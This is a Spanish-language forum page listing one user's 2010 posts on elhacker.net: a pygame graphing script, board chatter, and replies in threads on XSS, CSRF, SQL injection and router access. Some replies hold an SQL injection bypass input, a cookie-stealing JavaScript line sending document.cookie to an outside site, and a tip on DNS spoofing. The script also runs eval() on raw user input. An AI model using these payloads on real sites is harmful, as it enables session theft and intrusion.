elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: 1 ... 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 [32] 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 ... 62
311  Programación / PHP / Re: Firma dinamica por Castg! Observa tus datos automaticamente! en: 21 Febrero 2010, 22:28 pm
Naaa, yo creo que usan la librería GD..
PHP & GD.
Y usan Data Mining en el foro.
Bueno, eso es lo que yo creo...

Otra cosa Castg!, es posible que tu firma sea vulnerable a XSS y afecte a tu web, al tratar de leer el nombre de usuario y visualizarlo pueda ser que se ejecute XSS, no se ejecuta porque en el foro pasan el nombre de usuario por htmlentities y tu imagen toma el valor del nick  ya pasado por htmlentities del foro.
XSS en el texto de una imagen? LOL . Me parece que eso no es posible.
312  Programación / Scripting / [python][pygame] Programa que realiza la grafica de funciones. en: 21 Febrero 2010, 14:04 pm
Pues pongo este programa para los que les interese esto de pygame. Cualquier duda pregunten.
Para probarlo necesitan tener pygame instalado.
Os pongo una captura de pantalla de como va :

Código
  1. #!/usr/bin/python
  2. import pygame,random
  3. xp,yp = 400,400
  4. pantalla = pygame.display.set_mode((xp,yp))
  5. pantalla.fill((255,255,255))
  6. for x in range(0,xp,20):
  7.  pygame.draw.line(pantalla, (0,0,0) , (x, 1), (x, 800))
  8. for y in range(0,yp,20):
  9.  pygame.draw.line(pantalla, (0,0,0) , (1, y), (800, y))
  10. pygame.draw.line(pantalla,(0,0,0), (yp/2,0),(yp/2,xp),4)
  11. pygame.draw.line(pantalla,(0,0,0), (0,xp/2),(yp,xp/2),4)
  12. pygame.draw.circle(pantalla, (0,0,0), (xp/2,yp/2),5)
  13. pygame.display.flip()
  14. #### La pantalla esta cargada totalmente a partir de aqui
  15. while 1:
  16. colora,colorb,colorc = random.randint(0,250),random.randint(0,250),random.randint(0,250)
  17. funcion = raw_input("f(x)= ")
  18. listacoordenadas = []
  19. for x in range(-6,7):
  20.  listacoordenadas.append((x*20+xp/2,yp/2-eval(funcion)*20))
  21. for indice in range(len(listacoordenadas)-1):
  22.  pygame.draw.line(pantalla,(colora,colorb,colorc), listacoordenadas[indice],listacoordenadas[indice+1],4)
  23. pygame.display.flip()
  24. raw_input()
  25.  
 
313  Seguridad Informática / Hacking / Re: ok, estoy en el router.. en: 20 Febrero 2010, 18:37 pm
Lo de los DNS lo puedes usar para falsear dns.
Esto quiere decir que cuando un cliente de esa red haga una petición a un dominio cualquiera, tu podrás devolverle la ip que quieras y llevarle a un falso server.
314  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Subforo de Ciencias Exactas en: 18 Febrero 2010, 18:46 pm
Me lo voy a poner en la firma.

Saludos!
Yo lo haré también.
315  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Subforo de Ciencias Exactas en: 17 Febrero 2010, 22:14 pm
Yo estoy totalmente de acuerdo, he visto varios usuarios que saben un montón de esto.
316  Seguridad Informática / Nivel Web / Re: Como lograr este SQL inyection?? en: 8 Febrero 2010, 18:15 pm
Bueno, gracias por responder  ;), he intentado las opciones que me cuentan pero no consigo nada todavia, seguire mirando a ver que puedo hacer  :xD

Salu2
Tengo entendido que está programado por tí, no puedes hacer
Código:
out.write("select * from empleado where Codigo_empleado="+codigoEmpleado+" and Password_empleado="+password);
Y así ves mejor por qué no funciona?
317  Seguridad Informática / Nivel Web / Re: Como lograr este SQL inyection?? en: 7 Febrero 2010, 18:26 pm
Y si pones como código empleado blabla" or 1=1-- ?
318  Seguridad Informática / Nivel Web / Re: vulnerabilidad en hi5 beta en: 31 Enero 2010, 11:02 am
SDC trabajaba en hi5 así que me da la ligera impresión de que no vas a encontrar nada.
319  Seguridad Informática / Nivel Web / Re: Duda sobre xss en: 25 Enero 2010, 18:05 pm
Yo hablo de estas cosas que dijiste :
Citar
No entiendes bien, Cuando inserto una img con BBCODE estoy haciendo una peticion GET, pero cuando uso por ejemplo, <img <src=""> o un iframe estoy haciendo una peticion post. Si quieres puedes hacer una prueba..

1. El  navegador no interpreta BBCODE, el  que "interpreta" (lo que hace en realidad es transformar a html) el BBCODE es el software SMF (o el que sea), por lo tanto, cuando escribes en bbcode las tags img se transforman en el html resultante <img src=url>... .
2. La peticiones a imágenes y a iframe son siempre por GET (quizás no siempre, no lo sé , pero en este caso sí)

Y lo otro que dijiste :
Citar
Y otra cosa, Yo no estoy ejecutando ‭‬javascript en la img, lo que estoy haciendo es hacer una peticion a un archivo y ese archivo con tiene un codigo ‭‬javascript, osea el ‭‬javascript se esta ejecutando en el host que tengo el archivo con ‭‬javascript y no en la pagina que quiero atakar.
El javascript, no se ejecuta en el host que tienes el archivo, porque eso es el server, y además , la petición la haces haciendo creer al browser que lo que pide es una imagen, por lo tanto no busca código javascript dentro de ella y no puedes hacer nada con javascript.
320  Seguridad Informática / Nivel Web / Re: Duda sobre xss en: 25 Enero 2010, 17:45 pm
asi de facil se ejecuta ‭‬‭‬‭‬‭‬‭‬‭‬javascript en una imgaen :s seria muy facil robar cookies...

No entiendes bien, Cuando inserto una img con BBCODE estoy haciendo una peticion GET, pero cuando uso por ejemplo, <img <src=""> o un iframe estoy haciendo una peticion post. Si quieres puedes hacer una prueba..

Y otra cosa, Yo no estoy ejecutando ‭‬‭‬‭‬‭‬javascript en la img, lo que estoy haciendo es hacer una peticion a un archivo y ese archivo con tiene un codigo ‭‬‭‬‭‬‭‬javascript, osea el ‭‬‭‬‭‬‭‬javascript se esta ejecutando en el host que tengo el archivo con ‭‬‭‬‭‬‭‬javascript y no en la pagina que quiero atakar.
Y es verdad, no me fijé, el ‭‬‭‬‭‬javascript no se ejecuta en el server.
Claro tio...
Pueden mirar este post que hay un tema parecido pero por POST.
http://foro.elhacker.net/nivel_web/problema_xsrf-t277033.0.html

La mejor forma de comprenderlo es practicandolo y veras su gran potencial... Una vez lo use para unas votaciones online y puse la url entre tags de img de BBCODE y funcionaba correctamente...
Pueden provarlo en localhost...

estas ejecutando el codigo ‭‬‭‬javascript "document.topic.submit()" eso es ‭‬‭‬javascript, y se fuera como vos decis yo te pongo, "window.location = 'miweb.com/cookie?c='+document.cookie"

Claro tio funcionara perfectamente pero se estara ejecutando en el serve donde subas el archivo con ese codigo ‭‬javascript y no con el serve que quieres atakar. Osea te estas robando tus propias cookies y enviandotelas xD.
Eso si lo llamas en plan [nobbcode][nobbcode] :
No funciona
Porque el javascript lo ejecuta solo el navegador, y si el navegador cree que eso es una imagen no buscará código javascript. El document.form.submit() lo hace el navegador no el server.
Páginas: 1 ... 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 [32] 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 ... 62
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines